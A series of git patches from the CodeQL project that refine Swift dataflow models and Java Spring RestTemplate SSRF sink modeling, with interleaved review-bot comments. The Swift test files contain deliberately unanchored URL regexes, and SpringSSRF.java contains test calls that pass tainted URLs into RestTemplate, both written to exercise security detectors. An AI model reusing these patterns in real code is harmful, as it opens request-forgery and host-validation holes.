@@ -920,6 +944,12 @@ nodes | test2.swift:86:19:86:19 | v | semmle.label | v | | test2.swift:93:5:93:5 | [post] a2 [Collection element] | semmle.label | [post] a2 [Collection element] | | test2.swift:93:13:93:29 | call to source(_:) | semmle.label | call to source(_:) | +| test2.swift:95:5:95:5 | $v$generator [Collection element] | semmle.label | $v$generator [Collection element] | +| test2.swift:95:5:95:5 | call to next() [some:0] | semmle.label | call to next() [some:0] | +| test2.swift:95:9:95:9 | v | semmle.label | v | +| test2.swift:95:14:95:14 | a2 [Collection element] | semmle.label | a2 [Collection element] | +| test2.swift:95:14:95:14 | call to makeIterator() [Collection element] | semmle.label | call to makeIterator() [Collection element] | +| test2.swift:96:19:96:19 | v | semmle.label | v | | test2.swift:99:19:99:19 | a2 [Collection element] | semmle.label | a2 [Collection element] | | test2.swift:99:19:99:24 | ...[...] | semmle.label | ...[...] | | test2.swift:101:5:101:5 | $generator [Collection element, Tuple element at index 1] | semmle.label | $generator [Collection element, Tuple element at index 1] | 
@@ -1518,6 +1548,12 @@ nodes | test.swift:859:15:859:21 | ...[...] | semmle.label | ...[...] | | test.swift:860:15:860:15 | args [Collection element] | semmle.label | args [Collection element] | | test.swift:860:15:860:21 | ...[...] | semmle.label | ...[...] | +| test.swift:862:5:862:5 | $arg$generator [Collection element] | semmle.label | $arg$generator [Collection element] | +| test.swift:862:5:862:5 | call to next() [some:0] | semmle.label | call to next() [some:0] | +| test.swift:862:9:862:9 | arg | semmle.label | arg | +| test.swift:862:16:862:16 | args [Collection element] | semmle.label | args [Collection element] | +| test.swift:862:16:862:16 | call to makeIterator() [Collection element] | semmle.label | call to makeIterator() [Collection element] | +| test.swift:863:19:863:19 | arg | semmle.label | arg | | test.swift:866:21:866:29 | enter #keyPath(...) [Collection element] | semmle.label | enter #keyPath(...) [Collection element] | | test.swift:866:21:866:29 | exit #keyPath(...) | semmle.label | exit #keyPath(...) | | test.swift:866:27:866:29 | KeyPathComponent | semmle.label | KeyPathComponent | 
@@ -1661,8 +1697,10 @@ subpaths | test2.swift:53:15:53:28 | ... ??(_:_:) ... | test2.swift:46:17:46:33 | call to source(_:) | test2.swift:53:15:53:28 | ... ??(_:_:) ... | result | | test2.swift:54:15:54:24 | ...! | test2.swift:46:17:46:33 | call to source(_:) | test2.swift:54:15:54:24 | ...! | result | | test2.swift:70:19:70:19 | key | test2.swift:60:8:60:24 | call to source(_:) | test2.swift:70:19:70:19 | key | result | +| test2.swift:79:19:79:19 | v | test2.swift:76:30:76:46 | call to source(_:) | test2.swift:79:19:79:19 | v | result | | test2.swift:82:19:82:24 | ...[...] | test2.swift:76:30:76:46 | call to source(_:) | test2.swift:82:19:82:24 | ...[...] | result | | test2.swift:86:19:86:19 | v | test2.swift:76:30:76:46 | call to source(_:) | test2.swift:86:19:86:19 | v | result | +| test2.swift:96:19:96:19 | v | test2.swift:93:13:93:29 | call to source(_:) | test2.swift:96:19:96:19 | v | result | | test2.swift:99:19:99:24 | ...[...] | test2.swift:93:13:93:29 | call to source(_:) | test2.swift:99:19:99:24 | ...[...] | result | | test2.swift:103:19:103:19 | v | test2.swift:93:13:93:29 | call to source(_:) | test2.swift:103:19:103:19 | v | result | | test.swift:7:15:7:15 | t1 | test.swift:6:19:6:26 | call to source() | test.swift:7:15:7:15 | t1 | result | 
@@ -1789,6 +1827,7 @@ subpaths | test.swift:850:15:850:15 | v | test.swift:872:18:872:25 | call to source() | test.swift:850:15:850:15 | v | result | | test.swift:859:15:859:21 | ...[...] | test.swift:873:24:873:31 | call to source() | test.swift:859:15:859:21 | ...[...] | result | | test.swift:860:15:860:21 | ...[...] | test.swift:873:24:873:31 | call to source() | test.swift:860:15:860:21 | ...[...] | result | +| test.swift:863:19:863:19 | arg | test.swift:873:24:873:31 | call to source() | test.swift:863:19:863:19 | arg | result | | test.swift:867:15:867:38 | \\...[...] | test.swift:873:24:873:31 | call to source() | test.swift:867:15:867:38 | \\...[...] | result | | test.swift:880:19:880:19 | elem | test.swift:877:21:877:28 | call to source() | test.swift:880:19:880:19 | elem | result | | test.swift:884:15:884:31 | ...! | test.swift:877:21:877:28 | call to source() | test.swift:884:15:884:31 | ...! | result | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/test.swift b/swift/ql/test/library-tests/dataflow/dataflow/test.swift index a0c6c6aee88..515aa666201 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/test.swift +++ b/swift/ql/test/library-tests/dataflow/dataflow/test.swift @@ -860,7 +860,7 @@ func testVarargs3(_ v: Int, _ args: Int...) { sink(arg: args[1]) // $ flow=873 for arg in args { - sink(arg: arg) // $ MISSING: flow=873 + sink(arg: arg) // $ flow=873 } let myKeyPath = \[Int][1] diff --git a/swift/ql/test/library-tests/dataflow/dataflow/test2.swift b/swift/ql/test/library-tests/dataflow/dataflow/test2.swift index a1d9524a604..f0356f4dd22 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/test2.swift +++ b/swift/ql/test/library-tests/dataflow/dataflow/test2.swift @@ -76,7 +76,7 @@ func testArrays1() { var a1 = ["a", "b", "c", source("source5")] for v in a1 { - sink(arg: v) // $ MISSING: flow=source5 + sink(arg: v) // $ flow=source5 } for ix in 0 ..< a1.count { sink(arg: a1[ix]) // $ flow=source5 
@@ -93,7 +93,7 @@ func testArrays2() { a2[1] = source("source6") for v in a2 { - sink(arg: v) // $ MISSING: flow=source6 + sink(arg: v) // $ flow=source6 } for ix in 0 ..< a2.count { sink(arg: a2[ix]) // $ flow=source6 diff --git a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected index eb8c54fad76..6296a5ec04e 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected +++ b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected 
@@ -46,6 +46,9 @@ | UnanchoredUrlRegex.swift:71:46:71:46 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:78:39:78:39 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:79:39:79:39 | https?://good.com:8080 | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | +| UnanchoredUrlRegex.swift:82:3:82:3 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | +| UnanchoredUrlRegex.swift:83:3:83:3 | https?:\\/\\/good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | +| UnanchoredUrlRegex.swift:84:3:84:3 | ^https?://good.com | This hostname pattern may match any domain name, as it is missing a '$' or '/' at the end. | | UnanchoredUrlRegex.swift:91:3:91:3 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:101:39:101:39 | https?:\\/\\/good.com\\/([0-9]+) | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:107:39:107:39 | example\\.com\|whatever | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | diff --git a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift index 11da2ea6b1f..b2e8810e7b7 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift 
+++ b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift @@ -79,9 +79,9 @@ func tests(url: String, secure: Bool) throws { _ = try NSRegularExpression(pattern: #"https?://good.com:8080"#).firstMatch(in: input, range: inputRange) // BAD (missing anchor) let trustedUrlRegexs = [ - "https?://good.com", // BAD (missing anchor), referenced below [NOT DETECTED] - #"https?:\/\/good.com"#, // BAD (missing anchor), referenced below [NOT DETECTED] - "^https?://good.com" // BAD (missing post-anchor), referenced below [NOT DETECTED] + "https?://good.com", // BAD (missing anchor), referenced below + #"https?:\/\/good.com"#, // BAD (missing anchor), referenced below + "^https?://good.com" // BAD (missing post-anchor), referenced below ] for trustedUrlRegex in trustedUrlRegexs { if let _ = try NSRegularExpression(pattern: trustedUrlRegex).firstMatch(in: input, range: inputRange) { } From 23ed48ea128c7b435d7880098ecbaea64c474c74 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 28 Nov 2024 10:18:13 +0000 Subject: [PATCH 0756/1267] Swift: Add a couple more makeIterator() implementations to be safe. --- swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Array.qll | 1 + .../lib/codeql/swift/frameworks/StandardLibrary/Dictionary.qll | 3 ++- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Array.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Array.qll index 48494a1ed3a..f1d0677aa72 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Array.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Array.qll 
@@ -36,6 +36,7 @@ private class ArraySummaries extends SummaryModelCsv { ";Array;true;withUnsafeMutableBytes(_:);;;Argument[-1].CollectionElement;Argument[0].Parameter[0].CollectionElement;taint", ";Array;true;withUnsafeMutableBytes(_:);;;Argument[0].Parameter[0].CollectionElement;Argument[-1].CollectionElement;taint", ";Array;true;withUnsafeMutableBytes(_:);;;Argument[0].ReturnValue;ReturnValue;value", + ";Array;true;makeIterator();;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";ContiguousArray;true;withUnsafeBufferPointer(_:);;;Argument[-1];Argument[0].Parameter[0].CollectionElement;taint", ";ContiguousArray;true;withUnsafeBufferPointer(_:);;;Argument[-1].CollectionElement;Argument[0].Parameter[0].CollectionElement;value", ";ContiguousArray;true;withUnsafeBufferPointer(_:);;;Argument[0].ReturnValue;ReturnValue;value", diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Dictionary.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Dictionary.qll index 6ad2ba09e99..ca40beb1900 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Dictionary.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Dictionary.qll @@ -21,7 +21,8 @@ private class DictionarySummaries extends SummaryModelCsv { [ ";Dictionary;true;updateValue(_:forKey:);;;Argument[0];Argument[-1].CollectionElement.TupleElement[1];value", ";Dictionary;true;updateValue(_:forKey:);;;Argument[1];Argument[-1].CollectionElement.TupleElement[0];value", - ";Dictionary;true;updateValue(_:forKey:);;;Argument[-1].CollectionElement.TupleElement[1];ReturnValue.OptionalSome;value" + ";Dictionary;true;updateValue(_:forKey:);;;Argument[-1].CollectionElement.TupleElement[1];ReturnValue.OptionalSome;value", + ";Dictionary;true;makeIterator();;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ] } } From 65fb895ed5a4b8702a641051bc864f9300e05659 Mon Sep 17 00:00:00 2001 
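Review bot: The new `makeIterator()` row covers `Array` (and `Dictionary` in the second hunk), but the `ContiguousArray` rows that follow in this same list get no such row, and the commit changes no test file. If iteration over a `ContiguousArray` is not already covered by a more general model, a matching row `";ContiguousArray;true;makeIterator();;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",` would be needed so that `for ... in` loops over such values do not lose flow. A `for (k, v) in dict` case in the dataflow tests would also pin the Dictionary row. The summary list itself starts outside the hunk.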
From: Owen Mansel-Chan Date: Thu, 28 Nov 2024 15:51:01 +0000 Subject: [PATCH 0757/1267] (Unrelated) Fix typo in class name --- java/ql/lib/semmle/code/java/security/RequestForgery.qll | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/java/ql/lib/semmle/code/java/security/RequestForgery.qll b/java/ql/lib/semmle/code/java/security/RequestForgery.qll index a4e824c1cfe..a59bacb1fe7 100644 --- a/java/ql/lib/semmle/code/java/security/RequestForgery.qll +++ b/java/ql/lib/semmle/code/java/security/RequestForgery.qll @@ -81,8 +81,10 @@ private class HostnameSanitizingPrefix extends InterestingPrefix { * A value that is the result of prepending a string that prevents any value from controlling the * host of a URL. */ -private class HostnameSantizer extends RequestForgerySanitizer { - HostnameSantizer() { this.asExpr() = any(HostnameSanitizingPrefix hsp).getAnAppendedExpression() } +private class HostnameSanitizer extends RequestForgerySanitizer { + HostnameSanitizer() { + this.asExpr() = any(HostnameSanitizingPrefix hsp).getAnAppendedExpression() + } } /** From b5fbf2e9441dfcd5b424eb1fb9f4f52c420d9c9b Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Thu, 28 Nov 2024 13:03:09 +0000 Subject: [PATCH 0758/1267] Add models for third arg of getForObject No attempt to stop FPs. --- java/ql/lib/ext/org.springframework.web.client.model.yml | 3 +++ .../ql/test/query-tests/security/CWE-918/SpringSSRF.java | 9 +++++++++ 2 files changed, 12 insertions(+) diff --git a/java/ql/lib/ext/org.springframework.web.client.model.yml b/java/ql/lib/ext/org.springframework.web.client.model.yml index 79a7f577c3d..90abe1df71d 100644 --- a/java/ql/lib/ext/org.springframework.web.client.model.yml +++ b/java/ql/lib/ext/org.springframework.web.client.model.yml 
@@ -16,6 +16,9 @@ extensions: - ["org.springframework.web.client", "RestTemplate", False, "execute", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "getForEntity", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[0]", "request-forgery", "manual"] + - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[2]", "request-forgery", "manual"] # This is a workaround for the fact that sink model can't currently have access paths + # - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[2].ArrayElement", "request-forgery", "manual"] + # - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[2].MapValue", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "headForHeaders", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "optionsForAllow", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "patchForObject", "", "", "Argument[0]", "request-forgery", "manual"] diff --git a/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java b/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java index 6af4829ba02..917d8b29ac0 100644 --- a/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java +++ b/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java @@ -13,6 +13,7 @@ import java.net.http.HttpClient; import java.net.http.HttpRequest; import java.net.Proxy.Type; import java.io.InputStream; +import java.util.Map; import org.apache.http.client.methods.HttpGet; import javax.servlet.ServletException; 
@@ -32,6 +33,14 @@ public class SpringSSRF extends HttpServlet { restTemplate.exchange(fooResourceUrl, HttpMethod.POST, request, String.class); // $ SSRF restTemplate.execute(fooResourceUrl, HttpMethod.POST, null, null, "test"); // $ SSRF restTemplate.getForObject(fooResourceUrl, String.class, "test"); // $ SSRF + restTemplate.getForObject("http://{foo}", String.class, fooResourceUrl); // $ SSRF + restTemplate.getForObject("http://{foo}/a/b", String.class, fooResourceUrl); // $ SSRF + restTemplate.getForObject("http://safe.com/{foo}", String.class, fooResourceUrl); // $ SPURIOUS: SSRF // not bad - the tainted value does not affect the host + restTemplate.getForObject("http://{foo}", String.class, "safe.com", fooResourceUrl); // $ SPURIOUS: SSRF // not bad - the tainted value is unused + restTemplate.getForObject("http://{foo}", String.class, Map.of("foo", fooResourceUrl)); // $ SSRF + restTemplate.getForObject("http://safe.com/{foo}", String.class, Map.of("foo", fooResourceUrl)); // $ SPURIOUS: SSRF // not bad - the tainted value does not affect the host + restTemplate.getForObject("http://{foo}", String.class, Map.of("foo", "safe.com", "unused", fooResourceUrl)); // $ SPURIOUS: SSRF // not bad - the key for the tainted value is unused + restTemplate.getForObject("http://{foo}", String.class, Map.of("foo", "safe.com", fooResourceUrl, "unused")); // not bad - the tainted value is in a map key restTemplate.patchForObject(fooResourceUrl, new String("object"), String.class, "hi"); // $ SSRF restTemplate.postForEntity(new URI(fooResourceUrl), new String("object"), String.class); // $ SSRF restTemplate.postForLocation(fooResourceUrl, new String("object")); // $ SSRF From e08eac03d8c7c0c561cecb715e7fe525d1013a66 Mon Sep 17 00:00:00 2001 
From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 28 Nov 2024 17:44:34 +0000 Subject: [PATCH 0759/1267] Swift: Fix for Int.description. --- swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll | 2 +- .../library-tests/dataflow/taint/libraries/TaintInline.expected | 1 - 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll index b773177f152..0642003923b 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll @@ -167,7 +167,7 @@ private class StringFieldsInheritTaint extends TaintInheritingContent, "precomposedStringWithCompatibilityMapping", "removingPercentEncoding" ] or - namedTypeDecl.getFullName() = "CustomStringConvertible" and + namedTypeDecl.getFullName() = ["CustomStringConvertible", "BinaryInteger"] and fieldDecl.getName() = "description" or namedTypeDecl.getFullName() = "CustomDebugStringConvertible" and diff --git a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected index 5fcb458d4fc..4ba731519c4 100644 --- a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected @@ -1,5 +1,4 @@ testFailures | optionset.swift:60:49:61:1 | // $ tainted=60\n | Missing result: tainted=60 | | optionset.swift:65:58:66:1 | // $ tainted=65\n | Missing result: tainted=65 | -| string.swift:599:35:600:1 | // $ tainted=599\n | Missing result: tainted=599 | failures From 1fc112e7a7d68f53720e93f9c4c2f43a5629b98e Mon Sep 17 00:00:00 2001 
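Review bot: The String.qll hunk adds `"BinaryInteger"` next to `"CustomStringConvertible"` in the `getFullName()` check without saying why, and the commit message only mentions Int.description. A one-line comment above the condition, for example `// integer types declare description on BinaryInteger rather than via CustomStringConvertible` (to be confirmed against the standard library declaration), would keep the extra name from looking accidental. The enclosing characteristic predicate of `StringFieldsInheritTaint` starts and ends outside the hunk.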
From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 28 Nov 2024 18:14:04 +0000 Subject: [PATCH 0760/1267] Swift: Fix for OptionSet. --- .../swift/frameworks/StandardLibrary/RawRepresentable.qll | 5 ++++- .../dataflow/taint/libraries/TaintInline.expected | 2 -- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll index 8d56ffb4dfd..bc468d3c4f8 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/RawRepresentable.qll @@ -12,7 +12,10 @@ private import codeql.swift.dataflow.FlowSteps */ private class RawRepresentableSummaries extends SummaryModelCsv { override predicate row(string row) { - row = ";RawRepresentable;true;init(rawValue:);;;Argument[0];ReturnValue;taint" + row = [ + ";RawRepresentable;true;init(rawValue:);;;Argument[0];ReturnValue;taint", + ";OptionSet;true;init(rawValue:);;;Argument[0];ReturnValue;taint" + ] } } diff --git a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected index 4ba731519c4..8ec8033d086 100644 --- a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected @@ -1,4 +1,2 @@ testFailures -| optionset.swift:60:49:61:1 | // $ tainted=60\n | Missing result: tainted=60 | -| optionset.swift:65:58:66:1 | // $ tainted=65\n | Missing result: tainted=65 | failures From ba3f9d61346689ba61e69ffd17090e49f2a20fd0 Mon Sep 17 00:00:00 2001 
From: Owen Mansel-Chan Date: Thu, 28 Nov 2024 13:44:55 +0000 Subject: [PATCH 0761/1267] Convert model to QL --- .../org.springframework.web.client.model.yml | 3 --- .../java/frameworks/spring/SpringWebClient.qll | 18 ++++++++++++++++++ 2 files changed, 18 insertions(+), 3 deletions(-) diff --git a/java/ql/lib/ext/org.springframework.web.client.model.yml b/java/ql/lib/ext/org.springframework.web.client.model.yml index 90abe1df71d..79a7f577c3d 100644 --- a/java/ql/lib/ext/org.springframework.web.client.model.yml +++ b/java/ql/lib/ext/org.springframework.web.client.model.yml @@ -16,9 +16,6 @@ extensions: - ["org.springframework.web.client", "RestTemplate", False, "execute", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "getForEntity", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[0]", "request-forgery", "manual"] - - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[2]", "request-forgery", "manual"] # This is a workaround for the fact that sink model can't currently have access paths - # - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[2].ArrayElement", "request-forgery", "manual"] - # - ["org.springframework.web.client", "RestTemplate", False, "getForObject", "", "", "Argument[2].MapValue", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "headForHeaders", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "optionsForAllow", "", "", "Argument[0]", "request-forgery", "manual"] - ["org.springframework.web.client", "RestTemplate", False, "patchForObject", "", "", "Argument[0]", "request-forgery", "manual"] 
diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll index 3a8d4bb084a..d245f5ed244 100644 --- a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll @@ -27,3 +27,21 @@ class SpringWebClient extends Interface { this.hasQualifiedName("org.springframework.web.reactive.function.client", "WebClient") } } + +private import semmle.code.java.security.RequestForgery + +private class SpringWebClientRestTemplateGetForObject extends RequestForgerySink { + SpringWebClientRestTemplateGetForObject() { + exists(Method m, MethodCall mc, int i | + m.getDeclaringType() instanceof SpringRestTemplate and + m.hasName("getForObject") and + mc.getMethod() = m + | + // Deal with two overloads, with third parameter type `Object...` and + // `Map`. We cannot deal with mapvalue content easily but + // there is a default implicit taint read at sinks that will catch it. + this.asExpr() = mc.getArgument(i) and + i >= 2 + ) + } +} From 617f4f140e9fb4b2c64c8c8b91257c4c138512fb Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Thu, 28 Nov 2024 15:51:37 +0000 Subject: [PATCH 0762/1267] Make HostnameSanitizingPrefix public --- java/ql/lib/semmle/code/java/security/RequestForgery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/java/ql/lib/semmle/code/java/security/RequestForgery.qll b/java/ql/lib/semmle/code/java/security/RequestForgery.qll index a59bacb1fe7..c670d92b5ea 100644 --- a/java/ql/lib/semmle/code/java/security/RequestForgery.qll +++ b/java/ql/lib/semmle/code/java/security/RequestForgery.qll 
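Review bot: `m.hasName("getForObject")` restricts this sink to a single RestTemplate method, while SpringSSRF.java also calls `execute` and `patchForObject` with trailing URI-variable arguments (`"test"`, `"hi"`) that are expanded into the URL template in the same way. Tainted variables passed to those methods, or to `getForEntity`, `postForObject` and `exchange`, are therefore not reported by this class. The index of the first variable differs per method, so a follow-up would need a per-method offset rather than the fixed `i >= 2`; until then a comment such as `// Only getForObject is modeled; the uriVariables of other RestTemplate methods are not yet sinks.` would record the gap. The new class also has no QLDoc.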
@@ -63,7 +63,7 @@ abstract class RequestForgerySanitizer extends DataFlow::Node { } private class PrimitiveSanitizer extends RequestForgerySanitizer instanceof SimpleTypeSanitizer { } -private class HostnameSanitizingPrefix extends InterestingPrefix { +class HostnameSanitizingPrefix extends InterestingPrefix { int offset; HostnameSanitizingPrefix() { From 7648d397f8291e99e53f804b82d516ceb3cbb661 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Thu, 28 Nov 2024 16:50:26 +0000 Subject: [PATCH 0763/1267] Improve model to remove some false positives --- .../frameworks/spring/SpringWebClient.qll | 57 +++++++++++++++++-- .../security/CWE-918/SpringSSRF.java | 6 +- 2 files changed, 54 insertions(+), 9 deletions(-) diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll index d245f5ed244..79f0cb9c8bb 100644 --- a/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringWebClient.qll 
@@ -35,13 +35,58 @@ private class SpringWebClientRestTemplateGetForObject extends RequestForgerySink exists(Method m, MethodCall mc, int i | m.getDeclaringType() instanceof SpringRestTemplate and m.hasName("getForObject") and - mc.getMethod() = m + mc.getMethod() = m and + // Note that mc.getArgument(0) is modeled separately. This model is for + // arguments beyond the first two. There are two relevant overloads, one + // with third parameter type `Object...` and one with third parameter + // type `Map`. For the latter we cannot deal with mapvalue + // content easily but there is a default implicit taint read at sinks + // that will catch it. + this.asExpr() = mc.getArgument(i + 2) and + i >= 0 | - // Deal with two overloads, with third parameter type `Object...` and - // `Map`. We cannot deal with mapvalue content easily but - // there is a default implicit taint read at sinks that will catch it. - this.asExpr() = mc.getArgument(i) and - i >= 2 + // If we can determine that part of mc.getArgument(0) is a hostname + // sanitizing prefix, then we count how many placeholders occur before it + // and only consider that many arguments beyond the first two as sinks. + // For the `Map` overload this has the effect of only + // considering the map values as sinks if there is at least one + // placeholder in the URL before the hostname sanitizing prefix. + exists(HostnameSanitizingPrefix hsp | + hsp = mc.getArgument(0) and + i <= + max(int occurrenceIndex, int occurrenceOffset | + exists( + hsp.getStringValue().regexpFind("\\{[^}]*\\}", occurrenceIndex, occurrenceOffset) + ) and + occurrenceOffset < hsp.getOffset() + | + occurrenceIndex + ) + ) + or + // If we cannot determine that part of mc.getArgument(0) is a hostname + // sanitizing prefix, but it is a compile time constant and we can get + // its string value, then we count how many placeholders occur in it + // and only consider that many arguments beyond the first two as sinks. 
+ // For the `Map` overload this has the effect of only + // considering the map values as sinks if there is at least one + // placeholder in the URL. + not mc.getArgument(0) instanceof HostnameSanitizingPrefix and + i <= + max(int occurrenceIndex | + exists( + mc.getArgument(0) + .(CompileTimeConstantExpr) + .getStringValue() + .regexpFind("\\{[^}]*\\}", occurrenceIndex, _) + ) + | + occurrenceIndex + ) + or + // If we cannot determine the string value of mc.getArgument(0), then we + // conservatively consider all arguments as sinks. + not exists(mc.getArgument(0).(CompileTimeConstantExpr).getStringValue()) ) } } diff --git a/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java b/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java index 917d8b29ac0..895c68eda69 100644 --- a/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java +++ b/java/ql/test/query-tests/security/CWE-918/SpringSSRF.java 
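Review bot: The placeholder pattern `"\\{[^}]*\\}"` and the `max(... | occurrenceIndex)` aggregate are written out twice, once in the `HostnameSanitizingPrefix` branch and once in the compile-time-constant branch, so any later change to how placeholders are recognised has to be made in both places. A private helper such as `bindingset[template] private int getPlaceholderOffset(string template, int index) { exists(template.regexpFind("\\{[^}]*\\}", index, result)) }` would let both branches share the pattern, with the first branch adding only its `< hsp.getOffset()` bound. The class is also still missing a QLDoc comment stating that it models the URI-variable arguments and not the URL argument, which is handled elsewhere.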
@@ -35,10 +35,10 @@ public class SpringSSRF extends HttpServlet { restTemplate.getForObject(fooResourceUrl, String.class, "test"); // $ SSRF restTemplate.getForObject("http://{foo}", String.class, fooResourceUrl); // $ SSRF restTemplate.getForObject("http://{foo}/a/b", String.class, fooResourceUrl); // $ SSRF - restTemplate.getForObject("http://safe.com/{foo}", String.class, fooResourceUrl); // $ SPURIOUS: SSRF // not bad - the tainted value does not affect the host - restTemplate.getForObject("http://{foo}", String.class, "safe.com", fooResourceUrl); // $ SPURIOUS: SSRF // not bad - the tainted value is unused + restTemplate.getForObject("http://safe.com/{foo}", String.class, fooResourceUrl); // not bad - the tainted value does not affect the host + restTemplate.getForObject("http://{foo}", String.class, "safe.com", fooResourceUrl); // not bad - the tainted value is unused restTemplate.getForObject("http://{foo}", String.class, Map.of("foo", fooResourceUrl)); // $ SSRF - restTemplate.getForObject("http://safe.com/{foo}", String.class, Map.of("foo", fooResourceUrl)); // $ SPURIOUS: SSRF // not bad - the tainted value does not affect the host + restTemplate.getForObject("http://safe.com/{foo}", String.class, Map.of("foo", fooResourceUrl)); // not bad - the tainted value does not affect the host restTemplate.getForObject("http://{foo}", String.class, Map.of("foo", "safe.com", "unused", fooResourceUrl)); // $ SPURIOUS: SSRF // not bad - the key for the tainted value is unused restTemplate.getForObject("http://{foo}", String.class, Map.of("foo", "safe.com", fooResourceUrl, "unused")); // not bad - the tainted value is in a map key restTemplate.patchForObject(fooResourceUrl, new String("object"), String.class, "hi"); // $ SSRF From 